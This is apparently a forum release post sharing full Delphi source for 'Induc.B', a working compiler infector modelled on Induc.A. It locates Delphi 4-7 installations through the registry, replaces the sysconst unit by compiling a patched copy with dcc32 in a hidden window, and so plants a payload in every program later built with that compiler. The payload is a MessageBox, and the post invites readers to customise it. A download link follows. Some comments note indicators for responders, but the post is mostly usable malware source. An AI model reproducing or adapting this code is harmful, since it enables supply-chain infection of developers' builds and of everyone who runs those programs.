    Standard [REL]Delphi File-Infector [Induc.B]

    Most Delphi coders should know Induc.A; it is one of the first pieces of malware that modifies the compiler so that the compiler itself reproduces the malware.

    I just analyzed Induc.A and realized how it works, so I wrote a second version of it, which does not spread itself any further.

    This version just shows a MessageBox with "Infected by Induc.B" in EVERY app you compile with Delphi 4-7, but you can easily customize it.

    Source:
    Code:
    {
    Coder: Slayer616,Induc-Coder
    Version: Induc.B
    History: 19.05.2010 - First Try
    
    This is a first, non-self-spreading version of Induc!
    As you can see in "InfectionMessage", I just use a simple MessageBox
    as the infection payload, but you can customize that by editing the
    constant with your own Delphi code!
    }
    // Windows program that patches and recompiles Delphi's sysconst unit.
    // Artefacts it leaves in <RootDir>\lib: a replaced sysconst.dcu and the
    // original renamed to sysconst.bak (see BackUp / InfectSysconst below).
    program prjIndux;
    uses
      windows,classes;
    
    const
    // Pascal source text that WriteInfection appends right after the
    // `implementation` line of a copy of sysconst.pas: a `uses windows;`
    // clause plus an initialization block that shows a MessageBox. The post
    // states this ends up in every app compiled with the patched Delphi 4-7.
    InfectionMessage:string = 'uses windows;' + #13#10 + 'begin' + #13#10 + 'MessageBoxA(0,pchar(''Infected by Induc.B''),pchar(''By Slayer616''),0);' + #13#10 + 'end.';
    
    //Taken from Delphi Praxis
    // Reads the whole file at FileName into an AnsiString.
    // Returns an empty string for an empty file. TFileStream.Create raises
    // on open failure and nothing here catches it, so a missing file
    // propagates as an exception to the caller.
    // $0000 or $0020 are the numeric values of fmOpenRead or fmShareDenyNone;
    // the literals are presumably used because SysUtils is not in the uses list.
    function FileToString(const FileName: string): AnsiString;
    var
      fs: TFileStream;
      Len: Integer;
    begin
      fs := TFileStream.Create(FileName, $0000 or $0020);
      try
        Len := fs.Size;
        SetLength(Result, Len);
        if Len > 0 then
          fs.ReadBuffer(Result[1], Len);
      finally
        fs.Free;
      end;
    end;
    // Writes Str to FileName, creating the file or truncating an existing one
    // (fmCreate). Open/write failures raise and are not handled here.
    Procedure StringToFile(const FileName, Str: string);
    var
      fs: TFileStream;
      Len: Integer;
    begin
      fs := TFileStream.Create(FileName, fmcreate);
      try
        Len := Length(Str);
        fs.Write(Str[1], Len);
      finally
        fs.Free;
      end;
    end;
    
    // Rewrites <sPath>\lib\sysconst.pas in place: keeps everything up to and
    // including the `implementation` keyword plus one character, discards the
    // remainder of the unit, and appends InfectionMessage.
    // Returns False (file untouched) when the file is empty or the keyword is
    // absent; True after the patched source has been written back.
    // For responders: the patched .pas is transient — it is compiled and then
    // deleted by InfectSysconst, so only the resulting .dcu remains on disk.
    Function WriteInfection(sPath:string):boolean;
    var
      sPos:Integer;
      sTempStr:string;
    begin
    result := false;
    sTempStr :=FileToString(sPath + '\lib\sysconst.pas');
    if sTempStr = '' then exit;
    sPos := pos('implementation',sTempStr);
    if sPos = 0 then exit;
    // 'implementation' is 14 characters; +15 keeps the keyword and the
    // character following it (the line break, presumably).
    sPos := sPos + 15;
    sTempStr := copy(sTempstr,1,sPos);
    sTempstr := sTempstr + InfectionMessage;
    StringToFile(sPath + '\lib\sysconst.pas',sTempStr);
    result := true;
    end;
    
    // Runs the command-line compiler `<sPath>\bin\dcc32.exe <sPath>\lib\sysconst.pas`
    // with a hidden window (SW_HIDE) and blocks until it exits.
    // Result is the CreateProcess return value, i.e. whether dcc32 was
    // launched; the compiler's own exit code is not examined here.
    // Detection note: dcc32.exe started hidden by a parent other than the
    // Delphi IDE, with sysconst.pas as its only argument, is the observable
    // behaviour of this step.
    Function CompileInfectedSysconst(sPath:string):boolean;
    var
      SI:TStartupInfo;
      PI:TProcessInformation;
    begin
    fillchar(SI,sizeof(SI),0);
    SI.cb:=sizeof(SI);
    SI.dwFlags:=STARTF_USESHOWWINDOW;
    SI.wShowWindow:=SW_HIDE;
    result := CreateProcess(nil,pchar(sPath + '\bin\dcc32.exe' +' '+ sPath +'\lib\sysconst.pas'),nil,nil,false,NORMAL_PRIORITY_CLASS,nil,nil,SI,PI);
    if result then WaitForSingleObject(PI.hProcess,INFINITE)
    end;
    
    // Full replacement sequence for one Delphi installation rooted at sPath:
    //   1. copy the shipped RTL source <sPath>\source\rtl\sys\SysConst.pas
    //      to <sPath>\lib\sysconst.pas (CopyFile with bFailIfExists=False);
    //   2. patch that copy (WriteInfection);
    //   3. compile it with dcc32 (CompileInfectedSysconst) — the output
    //      sysconst.dcu presumably lands next to the source in \lib;
    //   4. delete the patched .pas so only the compiled unit is left.
    // Returns False and stops at the first failing step; note that step 3
    // only reports whether the compiler process started.
    // Recovery: the pre-existing sysconst.dcu is kept as sysconst.bak by BackUp.
    Function InfectSysconst(sPath:string):boolean;
    begin
      Result := true;
      If CopyFile(Pchar(sPath + '\source\rtl\sys\SysConst.pas'), Pchar(sPath + '\lib\sysconst.pas'),false) = false then begin
        Result := false;
        Exit;
      end;
      If WriteInfection(sPath) = false then begin
        Result := false;
        Exit;
      end;
      If CompileInfectedSysconst(sPath) = false then begin
        Result := false;
        Exit;
      end;
      If DeleteFile(pchar(sPath + '\lib\sysconst.pas')) = false then begin
        Result := false;
        Exit;
      end;
    end;
    
    // Renames <sPath>\lib\sysconst.dcu to <sPath>\lib\sysconst.bak.
    // MoveFile fails if the destination already exists, so an installation
    // that already carries sysconst.bak is not processed again by the caller.
    // Indicator for responders: a sysconst.bak in a Delphi \lib directory,
    // and a sysconst.dcu newer than the rest of the RTL units.
    Function BackUp(sPath:string):Boolean;
    begin
    Result := MoveFile(pchar(sPath+'\lib\sysconst.dcu'),pchar(sPath+'\lib\sysconst.bak'));
    end;
    
    // Program entry: locates Delphi 4.0-7.0 installations through the registry
    // (HKLM\Software\Borland\Delphi\<n>.0, value RootDir), announces each step
    // with a MessageBox, backs up sysconst.dcu and runs InfectSysconst.
    // The program stops entirely (Exit) on the first installation where backup
    // or patching fails; later versions are not visited in that case.
    var
     cVersion:char;
     c:array [1..255] of char;
     i:integer;
     sTemp,sSysconst:string;
     k:HKEY;
    begin
    MessageBoxA(0,Pchar('Welcome to Induc.B' + #13#10 + 'Welcome to the Sysconst Infector!' + #13#10 + 'I will now try to find the Compiler and the Sysconst.pas...'),'',0);
    for cVersion := '4' to '7' do begin
     if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+ cVersion + '.0'),0,KEY_READ,k)=0 then begin
      // i serves as the in/out buffer size (lpcbData); @i is also passed as
      // the unused lpType slot.
      i:=255;
      if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin
       sTemp := '';
       i:=1;
       //Copy Array of Char into String
       // Walks c until the first #0; relies on the registry value being
       // NUL-terminated within 255 bytes.
       while c[i]<>#0 do begin
        sTemp := sTemp + c[i];
        inc(i);
       end;
       sSysconst := sTemp ;
       MessageBoxA(0,Pchar('Delphi Version found: ' + cVersion + '.0' + #13#10 + 'Compilerpath: ' + sTemp + '\bin\dcc32.exe' + #13#10 + 'Sysconst.pas: ' + sSysconst + '\source\rtl\sys\SysConst.pas' + #13#10 + #13#10 + 'Now starting Backup of original Sysconst.dcu...'),pchar('WIN!'),0);
       // Backup failure (including an already-present sysconst.bak) aborts
       // the whole program, not just this version.
       If Backup(sSysconst) = false then begin
        MessageBoxA(0,Pchar('Failed to backup Sysconst!' + #13#10 + 'Cancelling Process...'),Pchar('Error!'),0);
        Exit;
       end;
       MessageBoxA(0,Pchar('Backup completed!' + #13#10 + 'Backupfile: ' + sSysconst +'\lib\sysconst.bak' + #13#10 + #13#10 + 'Now infecting Sysconst...'),'',0);
       If InfectSysconst(sSysconst) then begin
        // The message itself documents the clean-up: restore sysconst.bak
        // over sysconst.dcu in <RootDir>\lib.
        MessageBoxA(0,pchar('You are now infected by Induc.B' + #13#10 + 'For Desinfection just replace Sysconst.Bak with Sysconst.dcu in: ' +  sSysconst +'\lib\sysconst.bak'),'',0);
       end else begin
        MessageBoxA(0,pchar('Cant infect Sysconst! Cancelling Process...'),'',0);
        exit;
       end;
      end;
      RegCloseKey(k);
     end;
    end;
    end.
    Virusscan of Original File
    Virusscan of infected File


    Download: Download: Induc.B.rar | xup.in
